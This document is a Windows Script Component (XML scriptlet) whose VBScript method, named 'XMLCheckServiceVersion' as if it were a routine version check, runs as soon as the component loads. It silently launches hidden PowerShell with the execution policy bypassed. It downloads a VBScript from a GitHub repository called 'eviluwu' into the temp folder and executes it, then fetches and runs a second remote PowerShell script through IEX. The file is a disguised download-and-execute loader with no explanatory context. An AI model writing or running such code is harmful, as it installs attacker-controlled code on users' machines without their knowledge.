<?xml version="1.0"?>
<component>
<public>
    <method name="XMLCheckServiceVersion"/>
</public>
<script language="VBScript">
<![CDATA[
    Sub XMLCheckServiceVersion()
        Set objShell = CreateObject("WScript.Shell")
        objShell.Run "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command ""Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/b3at1/eviluwu/refs/heads/main/HP.vbs' -OutFile '$env:TEMP\HP'; wscript.exe //E:vbscript $env:TEMP\HP; IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/b3at1/eviluwu/refs/heads/main/uwu.ps1')""", 0
    End Sub
    XMLCheckServiceVersion()
]]>
</script>
</component>